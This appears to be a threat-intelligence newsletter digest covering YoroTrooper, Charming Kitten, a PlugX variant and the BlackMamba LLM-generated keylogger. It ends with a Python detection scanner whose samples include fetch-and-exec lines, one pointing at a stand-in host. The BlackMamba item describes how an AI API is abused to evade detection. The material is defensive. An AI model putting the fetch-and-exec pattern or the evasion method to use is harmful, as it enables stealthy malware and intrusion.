Take a look
- YoroTrooper targets the CIS countries.
- Charming Kitten spearphishing campaign.
- PlugX campaign expands to Africa.
- AI used to generate polymorphic keylogger.
YoroTrooper targets the CIS countries.
Cisco Talos is tracking a new threat actor the company calls “YoroTrooper,” which has been conducting cyberespionage campaigns against Europe and the CIS countries since at least June 2022. The threat actor primarily targets “government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States (CIS)” countries. The threat actor has successfully compromised the embassies of Azerbaijan and Turkmenistan, as well as accounts belonging to a “critical health care agency of the European Union (EU) and the World Health Organization (WIPO)”. YoroTrooper uses phishing emails with malicious attachments to distribute a variety of basic Trojans.
Investigators believe the threat actor speaks Russian, but do not attribute the group to any particular nation-state.
Charming Kitten spearphishing campaign.
Secureworks describes a phishing campaign targeting researchers documenting the oppression of women in Iran. Investigators believe the campaign is run by the Iranian government-linked APT COBALT ILLUSION (also known as Charming Kitten, APT42 or Phosphorus), a threat actor that frequently targets “academics, journalists, human rights defenders, political activists, Intergovernmental Organizations (IGOs), and Non-Governmental Organizations (NGOs) that focus on Iran.” In this case, the threat actor poses as a researcher working with the Atlantic Council think tank, using a fake Twitter account to send messages to various people working on Middle East political affairs research.
PlugX campaign expands to Africa.
Sophos is tracking a new version of the USB-propagating PlugX Trojan. The researchers say that the “novel aspects of this variant are a new payload and callbacks to a C2 server previously thought to have only a tenuous relationship to this worm.” PlugX is a well-known malware family that can spread via USB sticks, which can sometimes allow it to reach air-gapped systems. The malware is currently spreading in African countries, with infections observed in Ghana, Zimbabwe and Nigeria. The new variant was also observed in Papua New Guinea and Mongolia. Sophos believes this campaign is linked to the Chinese Mustang Panda APT, which is known to have used the malware in the past.
Gabor Szappanos, Director of Threat Research at Sophos, stated:
“In November 2022, we reported on a different group of active adversarial activity targeting government organizations in Southeast Asia that was also taking advantage of this ‘throwback’ method of propagation via USB drives. This worm appeared thousands of kilometers away in Africa a month later. Now this latest cluster of USB worm activity is hopping across three different continents. We don’t typically think of removable media as particularly ‘mobile,’ especially when compared to Internet-based attacks, but this dispersal method has proven highly effective in this part of the world.”
AI used to generate polymorphic keylogger.
HYAS researchers have developed a proof-of-concept strain of polymorphic malware that uses the OpenAI API to evade detection. The malware, which the researchers call “BlackMamba”, is a keylogger that is delivered as an apparently benign executable. However, once executed, BlackMamba will communicate with OpenAI and request that the AI generate keylogging code: “It then executes the dynamically generated code within the context of the benign program using Python’s exec() function, with the malicious polymorphic part remaining entirely in-memory. Every time BlackMamba runs, it re-synthesizes its keylogging capability, making the malicious component of this malware truly polymorphic. BlackMamba was tested against an industry-leading EDR that will remain unnamed, many times, resulting in zero alerts or detections.” The proof of concept then exfiltrates the captured data through a legitimate communication and collaboration tool (in this case, Microsoft Teams).
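The detectable pattern here is not the keylogger itself (which changes every run) but the static shape of the loader: code fetched from a remote API and handed straight to exec(). The following added example (illustrative detection logic, not HYAS or OpenAI code) is a small AST-based scanner that flags Python scripts where exec()/eval()/compile() consume data derived from a network or LLM API call; the module list and the sample scripts are constructed assumptions.

```python
import ast

# Modules whose return values we treat as untrusted code sources (assumed list).
REMOTE_SOURCES = {"openai", "requests", "urllib", "http", "socket", "httpx"}
DYNAMIC_EXEC = {"exec", "eval", "compile"}


def _root_name(node):
    """Leftmost Name of a dotted/indexed/called expression: openai.X.create(...) -> 'openai'."""
    while isinstance(node, (ast.Attribute, ast.Subscript, ast.Call)):
        node = node.func if isinstance(node, ast.Call) else node.value
    return node.id if isinstance(node, ast.Name) else None


class RemoteExecFinder(ast.NodeVisitor):
    def __init__(self):
        self.tainted = set()   # variable names that hold remote-derived data
        self.findings = []     # (line number, message)

    def _is_tainted(self, node):
        # An expression is tainted if it contains a call into a remote-source
        # module or references a variable that was assigned from one.
        for sub in ast.walk(node):
            if isinstance(sub, ast.Name) and sub.id in self.tainted:
                return True
            if isinstance(sub, ast.Call) and _root_name(sub.func) in REMOTE_SOURCES:
                return True
        return False

    def visit_Assign(self, node):
        # Simple taint propagation: targets of a tainted assignment become tainted.
        if self._is_tainted(node.value):
            for target in node.targets:
                self.tainted.update(n.id for n in ast.walk(target) if isinstance(n, ast.Name))
        self.generic_visit(node)

    def visit_Call(self, node):
        name = node.func.id if isinstance(node.func, ast.Name) else None
        if name in DYNAMIC_EXEC and node.args and self._is_tainted(node.args[0]):
            self.findings.append((node.lineno, f"{name}() of data derived from a remote source"))
        self.generic_visit(node)


def find_remote_exec(source):
    """Return [(lineno, message), ...] for dynamic execution of remote-derived data."""
    finder = RemoteExecFinder()
    finder.visit(ast.parse(source))
    return finder.findings


# Constructed samples: an LLM-fetch-then-exec loader shape, a direct HTTP fetch, and a benign exec.
LLM_LOADER = '\nimport openai\nresp = openai.Completion.create(model="m", prompt="...")\ncode = resp.choices[0].text\nexec(code)\n'
DIRECT_FETCH = '\nimport requests\nexec(requests.get("https://example.invalid/p").text)\n'
BENIGN = '\nimport math\ncode = "print(math.pi)"\nexec(code)\n'
```

Running `find_remote_exec` over a corpus of scripts gives a cheap triage signal for the in-memory loader shape; it is a heuristic, so reviewers should confirm findings by hand.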